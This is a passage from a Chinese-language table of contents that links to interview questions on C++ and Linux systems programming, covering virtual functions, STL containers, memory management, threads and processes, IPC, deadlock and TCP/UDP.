为什么析构函数要定义为虚函数?哪些函数不能是虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#309-%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E8%A6%81%E5%AE%9A%E4%B9%89%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E5%93%AA%E4%BA%9B%E5%87%BD%E6%95%B0%E4%B8%8D%E8%83%BD%E6%98%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.1.3 析构函数可以抛出异常吗?为什么不能抛出异常?除了资源泄露,还有其他需考虑的因素吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#310-%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%8F%AF%E4%BB%A5%E6%8A%9B%E5%87%BA%E5%BC%82%E5%B8%B8%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E8%83%BD%E6%8A%9B%E5%87%BA%E5%BC%82%E5%B8%B8%E9%99%A4%E4%BA%86%E8%B5%84%E6%BA%90%E6%B3%84%E9%9C%B2%E8%BF%98%E6%9C%89%E5%85%B6%E4%BB%96%E9%9C%80%E8%80%83%E8%99%91%E7%9A%84%E5%9B%A0%E7%B4%A0%E5%90%97) ##### [13.1.4 动态链接库的两种使用方法及特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#311%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E5%BA%93%E7%9A%84%E4%B8%A4%E7%A7%8D%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95%E5%8F%8A%E7%89%B9%E7%82%B9) ##### [13.1.5 STL各类容器(3个顺序+4个关联+1个无序关联)的实现原理及使用情形](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#312-stl%E5%90%84%E7%B1%BB%E5%AE%B9%E5%99%A83%E4%B8%AA%E9%A1%BA%E5%BA%8F4%E4%B8%AA%E5%85%B3%E8%81%941%E4%B8%AA%E6%97%A0%E5%BA%8F%E5%85%B3%E8%81%94%E7%9A%84%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86%E5%8F%8A%E4%BD%BF%E7%94%A8%E6%83%85%E5%BD%A2) ##### [13.1.6 什么是STL?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#313%E4%BB%80%E4%B9%88%E6%98%AFstl) ##### [13.1.7 什么是智能指针?底层实现?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#314-%E4%BB%80%E4%B9%88%E6%98%AF%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E5%BA%95%E5%B1%82%E5%AE%9E%E7%8E%B0)) ##### [13.1.8 多进程与多线程之间的区别?(最好要了解透彻)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#315-%E5%A4%9A%E8%BF%9B%E7%A8%8B%E4%B8%8E%E5%A4%9A%E7%BA%BF%E7%A8%8B%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB%E6%9C%80%E5%A5%BD%E8%A6%81%E4%BA%86%E8%A7%A3%E9%80%8F%E5%BD%BB) ##### 13.1.9 [什么是进程池和线程池?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#316-%E4%BB%80%E4%B9%88%E6%98%AF%E8%BF%9B%E7%A8%8B%E6%B1%A0%E5%92%8C%E7%BA%BF%E7%A8%8B%E6%B1%A0) ##### [13.2.0 进程间的通信方式有哪些?如何实现的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#317%E8%BF%9B%E7%A8%8B%E9%97%B4%E7%9A%84%E9%80%9A%E4%BF%A1%E6%96%B9%E5%BC%8F%E6%9C%89%E5%93%AA%E4%BA%9B%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [13.2.1 简述inux中的同步与异步机制?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#318-%E7%AE%80%E8%BF%B0inux%E4%B8%AD%E7%9A%84%E5%90%8C%E6%AD%A5%E4%B8%8E%E5%BC%82%E6%AD%A5%E6%9C%BA%E5%88%B6) ##### [13.2.2 简述阻塞与非阻塞?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#319%E7%AE%80%E8%BF%B0%E9%98%BB%E5%A1%9E%E4%B8%8E%E9%9D%9E%E9%98%BB%E5%A1%9E) ##### [13.2.3 简述Linux中的5种I/O模式?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#320%E7%AE%80%E8%BF%B0linux%E4%B8%AD%E7%9A%845%E7%A7%8Dio%E6%A8%A1%E5%BC%8F) ##### [13.2.4 什么是死锁?四个死锁的条件?避免死锁的方法?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#321-%E4%BB%80%E4%B9%88%E6%98%AF%E6%AD%BB%E9%94%81%E5%9B%9B%E4%B8%AA%E6%AD%BB%E9%94%81%E7%9A%84%E6%9D%A1%E4%BB%B6%E9%81%BF%E5%85%8D%E6%AD%BB%E9%94%81%E7%9A%84%E6%96%B9%E6%B3%95) ##### [13.2.5 
Linux的任务调度机制是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#322-linux%E7%9A%84%E4%BB%BB%E5%8A%A1%E8%B0%83%E5%BA%A6%E6%9C%BA%E5%88%B6%E6%98%AF%E4%BB%80%E4%B9%88) ##### [13.2.6 标准库函数与系统调用的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#323%E6%A0%87%E5%87%86%E5%BA%93%E5%87%BD%E6%95%B0%E4%B8%8E%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.2.7 分别简述三次握手与四次挥手的过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#324-%E5%88%86%E5%88%AB%E7%AE%80%E8%BF%B0%E4%B8%89%E6%AC%A1%E6%8F%A1%E6%89%8B%E4%B8%8E%E5%9B%9B%E6%AC%A1%E6%8C%A5%E6%89%8B%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [13.2.8 tcp和udp之间的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#325-tcp%E5%92%8Cudp%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.2.9 epoll有哪些触发模式?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#327-epoll%E6%9C%89%E5%93%AA%E4%BA%9B%E8%A7%A6%E5%8F%91%E6%A8%A1%E5%BC%8F) ##### [13.3.1 C和C++的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#329c%E5%92%8Cc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.2 C++中指针和引用的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#330c%E4%B8%AD%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.3 结构体struct和共同体union(联合)的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#331%E7%BB%93%E6%9E%84%E4%BD%93struct%E5%92%8C%E5%85%B1%E5%90%8C%E4%BD%93union%E8%81%94%E5%90%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.4 #define和const的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#332define%E5%92%8Cconst%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.5 重载overload,覆盖(重写)override,隐藏(重定义)overwrite,这三者之间的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#333%E9%87%8D%E8%BD%BDoverload%E8%A6%86%E7%9B%96%E9%87%8D%E5%86%99override%E9%9A%90%E8%97%8F%E9%87%8D%E5%AE%9A%E4%B9%89overwrite%E8%BF%99%E4%B8%89%E8%80%85%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.6 new、delete、malloc、free之间的关系](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#334newdeletemallocfree%E4%B9%8B%E9%97%B4%E7%9A%84%E5%85%B3%E7%B3%BB) ##### [13.3.7 delete和delete[]的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#335delete%E5%92%8Cdelete%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.3.8 虚函数、纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#336%E8%99%9A%E5%87%BD%E6%95%B0%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.3.9 STL库用过吗?常见的STL容器有哪些?算法用过几个?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#337stl%E5%BA%93%E7%94%A8%E8%BF%87%E5%90%97%E5%B8%B8%E8%A7%81%E7%9A%84stl%E5%AE%B9%E5%99%A8%E6%9C%89%E5%93%AA%E4%BA%9B%E7%AE%97%E6%B3%95%E7%94%A8%E8%BF%87%E5%87%A0%E4%B8%AA) ##### [13.4.1 const知道吗?解释一下其作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#338const%E7%9F%A5%E9%81%93%E5%90%97%E8%A7%A3%E9%87%8A%E4%B8%80%E4%B8%8B%E5%85%B6%E4%BD%9C%E7%94%A8) ##### [13.4.2 虚函数是怎么实现的](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#339%E8%99%9A%E5%87%BD%E6%95%B0%E6%98%AF%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84) ##### [13.4.3 
堆和栈的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#340%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.4.4 关键字static的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#341%E5%85%B3%E9%94%AE%E5%AD%97static%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [13.4.5 STL中map和set的原理(关联式容器)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#342stl%E4%B8%ADmap%E5%92%8Cset%E7%9A%84%E5%8E%9F%E7%90%86%E5%85%B3%E8%81%94%E5%BC%8F%E5%AE%B9%E5%99%A8) ##### [13.4.6 #include<file.h> #include "file.h" 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#343includefileh-include-fileh-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.4.7 什么是内存泄漏?面对内存泄漏和指针越界,你有哪些方法?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#344%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E9%9D%A2%E5%AF%B9%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E5%92%8C%E6%8C%87%E9%92%88%E8%B6%8A%E7%95%8C%E4%BD%A0%E6%9C%89%E5%93%AA%E4%BA%9B%E6%96%B9%E6%B3%95) ##### [13.4.8 定义和声明的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#345%E5%AE%9A%E4%B9%89%E5%92%8C%E5%A3%B0%E6%98%8E%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.4.9 C++文件编译与执行的四个阶段](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#346c%E6%96%87%E4%BB%B6%E7%BC%96%E8%AF%91%E4%B8%8E%E6%89%A7%E8%A1%8C%E7%9A%84%E5%9B%9B%E4%B8%AA%E9%98%B6%E6%AE%B5) ##### [13.5.1 STL中unordered_map和map的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#347stl%E4%B8%ADunordered_map%E5%92%8Cmap%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.5.2 C++的内存管理](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#348c%E7%9A%84%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86) ##### [13.5.3 构造函数为什么一般不定义为虚函数?而析构函数一般写成虚函数的原因 ?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#349%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%80%E8%88%AC%E4%B8%8D%E5%AE%9A%E4%B9%89%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E8%80%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E4%B8%80%E8%88%AC%E5%86%99%E6%88%90%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E5%8E%9F%E5%9B%A0-) ##### [13.5.4 静态绑定和动态绑定的介绍](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#350%E9%9D%99%E6%80%81%E7%BB%91%E5%AE%9A%E5%92%8C%E5%8A%A8%E6%80%81%E7%BB%91%E5%AE%9A%E7%9A%84%E4%BB%8B%E7%BB%8D) ##### [13.5.5 引用是否能实现动态绑定,为什么引用可以实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#351%E5%BC%95%E7%94%A8%E6%98%AF%E5%90%A6%E8%83%BD%E5%AE%9E%E7%8E%B0%E5%8A%A8%E6%80%81%E7%BB%91%E5%AE%9A%E4%B8%BA%E4%BB%80%E4%B9%88%E5%BC%95%E7%94%A8%E5%8F%AF%E4%BB%A5%E5%AE%9E%E7%8E%B0) ##### [13.5.6 深拷贝和浅拷贝的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#352%E6%B7%B1%E6%8B%B7%E8%B4%9D%E5%92%8C%E6%B5%85%E6%8B%B7%E8%B4%9D%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.5.7 什么情况下会调用拷贝构造函数(三种情况)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#353%E4%BB%80%E4%B9%88%E6%83%85%E5%86%B5%E4%B8%8B%E4%BC%9A%E8%B0%83%E7%94%A8%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E4%B8%89%E7%A7%8D%E6%83%85%E5%86%B5) ##### [13.5.8 C++的四种强制转换](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#354c%E7%9A%84%E5%9B%9B%E7%A7%8D%E5%BC%BA%E5%88%B6%E8%BD%AC%E6%8D%A2) ##### [13.5.9 
调试程序的方法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#355%E8%B0%83%E8%AF%95%E7%A8%8B%E5%BA%8F%E7%9A%84%E6%96%B9%E6%B3%95) ##### [13.6.1 extern“C”作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#356externc%E4%BD%9C%E7%94%A8) ##### [13.6.2 typdef和define区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#357typdef%E5%92%8Cdefine%E5%8C%BA%E5%88%AB) ##### [13.6.3 引用作为函数参数以及返回值的好处](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#358%E5%BC%95%E7%94%A8%E4%BD%9C%E4%B8%BA%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E4%BB%A5%E5%8F%8A%E8%BF%94%E5%9B%9E%E5%80%BC%E7%9A%84%E5%A5%BD%E5%A4%84) ##### [13.6.4 纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#359%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.6.5 什么是野指针](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#360%E4%BB%80%E4%B9%88%E6%98%AF%E9%87%8E%E6%8C%87%E9%92%88) ##### [13.6.6 线程安全和线程不安全](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#361%E7%BA%BF%E7%A8%8B%E5%AE%89%E5%85%A8%E5%92%8C%E7%BA%BF%E7%A8%8B%E4%B8%8D%E5%AE%89%E5%85%A8) ##### [13.6.7 C++中内存泄漏的几种情况](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#362c%E4%B8%AD%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F%E7%9A%84%E5%87%A0%E7%A7%8D%E6%83%85%E5%86%B5) ##### [13.6.8 栈溢出的原因以及解决方法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#363%E6%A0%88%E6%BA%A2%E5%87%BA%E7%9A%84%E5%8E%9F%E5%9B%A0%E4%BB%A5%E5%8F%8A%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95) ##### [13.6.9 C++标准库vector以及迭代器](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#364c%E6%A0%87%E5%87%86%E5%BA%93vector%E4%BB%A5%E5%8F%8A%E8%BF%AD%E4%BB%A3%E5%99%A8) ##### [13.7.1 C++中vector和list的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#365c%E4%B8%ADvector%E5%92%8Clist%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.7.2 C++中的基本数据类型及派生类型](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#366c%E4%B8%AD%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B%E5%8F%8A%E6%B4%BE%E7%94%9F%E7%B1%BB%E5%9E%8B) ##### [13.7.3 友元函数和友元类](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#367%E5%8F%8B%E5%85%83%E5%87%BD%E6%95%B0%E5%92%8C%E5%8F%8B%E5%85%83%E7%B1%BB) ##### [13.7.4 c++函数库中一些实用的函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#368c%E5%87%BD%E6%95%B0%E5%BA%93%E4%B8%AD%E4%B8%80%E4%BA%9B%E5%AE%9E%E7%94%A8%E7%9A%84%E5%87%BD%E6%95%B0) ##### [13.7.5 线程的基本概念、线程的基本状态及状态之间的关系?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#369%E7%BA%BF%E7%A8%8B%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5%E7%BA%BF%E7%A8%8B%E7%9A%84%E5%9F%BA%E6%9C%AC%E7%8A%B6%E6%80%81%E5%8F%8A%E7%8A%B6%E6%80%81%E4%B9%8B%E9%97%B4%E7%9A%84%E5%85%B3%E7%B3%BB) ##### [13.7.6 线程与进程的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#370%E7%BA%BF%E7%A8%8B%E4%B8%8E%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.7.7 C++多线程有几种实现方法,都是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#371c%E5%A4%9A%E7%BA%BF%E7%A8%8B%E6%9C%89%E5%87%A0%E7%A7%8D%E5%AE%9E%E7%8E%B0%E6%96%B9%E6%B3%95%E9%83%BD%E6%98%AF%E4%BB%80%E4%B9%88) ##### [13.7.8 
C和C++的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#373c%E5%92%8Cc%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.7.9 封装、继承、多态](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#374%E5%B0%81%E8%A3%85%E7%BB%A7%E6%89%BF%E5%A4%9A%E6%80%81) ##### [13.8.1 虚函数的作用及其实现原理](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#375%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8%E5%8F%8A%E5%85%B6%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86) ##### [13.8.2 深拷贝和浅拷贝(值拷贝和位拷贝)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#376%E6%B7%B1%E6%8B%B7%E8%B4%9D%E5%92%8C%E6%B5%85%E6%8B%B7%E8%B4%9D%E5%80%BC%E6%8B%B7%E8%B4%9D%E5%92%8C%E4%BD%8D%E6%8B%B7%E8%B4%9D) ##### [13.8.3 虚函数、纯虚函数怎么实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#377%E8%99%9A%E5%87%BD%E6%95%B0%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0) ##### [13.8.4 为什么要有纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#378%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E6%9C%89%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.8.5 纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#379%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.8.6 为什么要有虚析构函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#380%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E6%9C%89%E8%99%9A%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0) ##### [13.8.7 构造函数能不能是虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#381%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E8%83%BD%E4%B8%8D%E8%83%BD%E6%98%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [13.8.8 C++里面构造函数能有返回值吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#382c%E9%87%8C%E9%9D%A2%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E8%83%BD%E6%9C%89%E8%BF%94%E5%9B%9E%E5%80%BC%E5%90%97) ##### [13.8.9 构造函数和析构函数能被继承吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#383%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%92%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E8%83%BD%E8%A2%AB%E7%BB%A7%E6%89%BF%E5%90%97) ##### [13.9.1 C++中Overload、Overwrite及Override的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#384c%E4%B8%ADoverloadoverwrite%E5%8F%8Aoverride%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.9.2 一个空的class类里有什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#385%E4%B8%80%E4%B8%AA%E7%A9%BA%E7%9A%84class%E7%B1%BB%E9%87%8C%E6%9C%89%E4%BB%80%E4%B9%88) ##### [13.9.3 C++中一个空类的大小为什么是1?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#386c%E4%B8%AD%E4%B8%80%E4%B8%AA%E7%A9%BA%E7%B1%BB%E7%9A%84%E5%A4%A7%E5%B0%8F%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF1) ##### [13.9.4 一个结构体中有一个int,一个char,一个static int,问这个结构体占多少内存?(涉及到内存对齐机制)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#387%E4%B8%80%E4%B8%AA%E7%BB%93%E6%9E%84%E4%BD%93%E4%B8%AD%E6%9C%89%E4%B8%80%E4%B8%AAint%E4%B8%80%E4%B8%AAchar%E4%B8%80%E4%B8%AAstatic-int%E9%97%AE%E8%BF%99%E4%B8%AA%E7%BB%93%E6%9E%84%E4%BD%93%E5%8D%A0%E5%A4%9A%E5%B0%91%E5%86%85%E5%AD%98%E6%B6%89%E5%8F%8A%E5%88%B0%E5%86%85%E5%AD%98%E5%AF%B9%E9%BD%90%E6%9C%BA%E5%88%B6) ##### [13.9.5 结构体与联合体的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#388%E7%BB%93%E6%9E%84%E4%BD%93%E4%B8%8E%E8%81%94%E5%90%88%E4%BD%93%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [13.9.6 
函数与宏的差别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#389%E5%87%BD%E6%95%B0%E4%B8%8E%E5%AE%8F%E7%9A%84%E5%B7%AE%E5%88%AB) ##### [13.9.7 宏函数和inline函数的异同点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#390%E5%AE%8F%E5%87%BD%E6%95%B0%E5%92%8Cinline%E5%87%BD%E6%95%B0%E7%9A%84%E5%BC%82%E5%90%8C%E7%82%B9) ##### [13.9.8 define 和 typedef 区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#391define-%E5%92%8C-typedef-%E5%8C%BA%E5%88%AB) ##### [13.9.9 标准C++中的include “” 与<>的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#392%E6%A0%87%E5%87%86c%E4%B8%AD%E7%9A%84include--%E4%B8%8E%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.1.1 C++的内存管理机制](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#393c%E7%9A%84%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86%E6%9C%BA%E5%88%B6) ##### [14.1.2 C语言中的malloc/free和C++中的new/delete的区别和联系](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#394c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84mallocfree%E5%92%8Cc%E4%B8%AD%E7%9A%84newdelete%E7%9A%84%E5%8C%BA%E5%88%AB%E5%92%8C%E8%81%94%E7%B3%BB) ##### [14.1.3 迭代和递归区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#395%E8%BF%AD%E4%BB%A3%E5%92%8C%E9%80%92%E5%BD%92%E5%8C%BA%E5%88%AB) ##### [14.1.4 不可操作的操作符](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#396%E4%B8%8D%E5%8F%AF%E6%93%8D%E4%BD%9C%E7%9A%84%E6%93%8D%E4%BD%9C%E7%AC%A6) ##### [14.1.5 C++关键字mutable作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#397c%E5%85%B3%E9%94%AE%E5%AD%97mutable%E4%BD%9C%E7%94%A8) ##### [14.1.6 引用与指针有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#398%E5%BC%95%E7%94%A8%E4%B8%8E%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [14.1.7 什么是黑盒测试和白盒测试?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#399%E4%BB%80%E4%B9%88%E6%98%AF%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95%E5%92%8C%E7%99%BD%E7%9B%92%E6%B5%8B%E8%AF%95) ##### [14.1.8 你知道的类模版有哪些](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#400%E4%BD%A0%E7%9F%A5%E9%81%93%E7%9A%84%E7%B1%BB%E6%A8%A1%E7%89%88%E6%9C%89%E5%93%AA%E4%BA%9B) ##### [14.1.9 new可以搭配free吗,为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#401new%E5%8F%AF%E4%BB%A5%E6%90%AD%E9%85%8Dfree%E5%90%97%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [14.2.1 怎么查看内存泄漏](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#402%E6%80%8E%E4%B9%88%E6%9F%A5%E7%9C%8B%E5%86%85%E5%AD%98%E6%B3%84%E6%BC%8F) ##### [14.2.2 什么是内存溢出](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#403%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E5%AD%98%E6%BA%A2%E5%87%BA) ##### [14.2.3 内存溢出的解决方案](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#404%E5%86%85%E5%AD%98%E6%BA%A2%E5%87%BA%E7%9A%84%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88) ##### [14.2.4 函数指针与指针函数分别是什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#405%E5%87%BD%E6%95%B0%E6%8C%87%E9%92%88%E4%B8%8E%E6%8C%87%E9%92%88%E5%87%BD%E6%95%B0%E5%88%86%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [14.2.5 C++11新特性了解吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#406c11%E6%96%B0%E7%89%B9%E6%80%A7%E4%BA%86%E8%A7%A3%E5%90%97) ##### [14.2.6 
接口和抽象类的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#407%E6%8E%A5%E5%8F%A3%E5%92%8C%E6%8A%BD%E8%B1%A1%E7%B1%BB%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [14.2.7 预编译在做些什么事情?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#408%E9%A2%84%E7%BC%96%E8%AF%91%E5%9C%A8%E5%81%9A%E4%BA%9B%E4%BB%80%E4%B9%88%E4%BA%8B%E6%83%85) ##### [14.2.8 动态库和静态库?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#410%E5%8A%A8%E6%80%81%E5%BA%93%E5%92%8C%E9%9D%99%E6%80%81%E5%BA%93) ##### [14.2.9 堆和栈的区别,以及为什么栈效率高](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#411%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB%E4%BB%A5%E5%8F%8A%E4%B8%BA%E4%BB%80%E4%B9%88%E6%A0%88%E6%95%88%E7%8E%87%E9%AB%98) ##### [14.3.1 